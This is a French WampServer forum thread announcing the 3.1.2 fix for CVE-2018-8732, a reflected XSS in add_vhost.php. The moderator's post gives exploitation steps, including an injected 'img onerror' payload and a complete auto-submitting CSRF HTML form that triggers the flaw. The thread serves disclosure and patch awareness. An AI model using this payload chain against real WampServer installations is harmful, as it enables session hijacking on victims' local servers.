WampServer

Apache, PHP, MySQL on Windows 

 
  • Accueil forum
  • Retour à WampServer
  • presentation
  • Download
  • Addons
  • Formations
  • Alter Way

 
Voir le sujet: Précédent•Suivant
Aller à : Liste des Forums•Liste des messages•Nouvelle discussion•Recherche•Connexion•Imprimer la vue
Mise à jour 3.1.2 et vulnérabilité XSS
Envoyé par: Otomatic (Modérateur)
Date: 19 March 2018 à 16:48

Bonjour,

Avec le changelog de la mise à jour 3.1.2 vous avez pu lire :

Liste des évolutions
--- Wampserver 3.1.2
- Correction d'une vulnérabilité de sécurité trouvée par Vipin Chaudhary dans la page add_vhost.php
L'ID CVE est CVE-2018-8732.
Cross site scripting (XSS) même si le serveur et l'hôte local utilisent la directive Apache "Require local".

Qu'est-ce qu'une vulnérabilité XSS ?

XSS : Reflected cross site scripting est exploitable à distance.

Comment peut-on exploiter cette vulnérabilité :
1. Allez dans Ajouter un hôte virtuel et ajoutez-en un à wampserver.
2. Allez sur Supress Virtual host et sélectionnez-en un pour supprimer puis interceptez la requête en utilisant “burp suite” ou tout autre outil de proxy.
3. Changez la valeur du paramètre “virtual_del[]” en "><img src=x onerror=alert(1)>" et transférez le et vous verrez alors le XSS déclenché.

Comment peut-on la voir :
1. Copiez et collez cette requête CSRF dans le bloc-notes et enregistrez-la sous le nom de nimportequoi.html.
<html>
  <body onload="wamp_csrf.submit();">
    <form action='http://localhost/add_vhost.php?lang=english' name="wamp_csrf" method="POST">
      <input type="hidden" name="virtual&#95;del&#91;&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&gt;" />
      <input type="hidden" name="vhostdelete" value="Suppress&#32;VirtualHost" />
    </form>
  </body>
</html>
Attention action="[localhost] contient réellement action='http://localhost/add_vhost.php?lang=english' en remplaçant les simple quotes(') par des double quote("winking smiley
2. Assurez-vous que Wampserver est démarré, puis ouvrez la page html sauvegardée dans mozilla firefox et vous verrez le XSS se déclencher.

Là, il s'agit uniquement de montrer l'existence de cette vulnérabilité en affichant une fenêtre d'alerte. Mais, à la place de l'affichage de cette fenêtre, le malfaisant, lorsque la victime clique sur le lien et que le XSS se déclenche, peut effectuer le détournement de session et d'autres attaques.

---------------------------------------------------------------
Documentation Apache - Documentation PHP - Documentation MySQL - Wampserver install files & addons



Modifie 2 fois. Derniere modification le 20/03/2018 à 18:03 par Otomatic.

Options: Répondre•Citer ce Message
Re: Mise à jour 3.1.2 et vulnérabilité XSS
Envoyé par: Artemus24 (---.70.16.109.rev.sfr.net)
Date: 19 March 2018 à 17:24

Salut Otomatic.

Merci !

@+

----------------------------------------------------------------------------------------------------------------------------------------------------------------
Mon site : [www.jcz.fr]

Options: Répondre•Citer ce Message
Re: Mise à jour 3.1.2 et vulnérabilité XSS
Envoyé par: ritchi (---.fbx.proxad.net)
Date: 19 March 2018 à 21:16

Bonjour Otomatic. Merci pour ces explications.

Cordialement.

Options: Répondre•Citer ce Message


Aller à : Liste des Forums•Liste des messages•Recherche•Connexion
Désolé, seuls les utilisateurs connectés peuvent envoyer des messages dans ce forum.
Cliquer ici pour se connecter

design by jidePowered by Alter Way get firefoxget PHP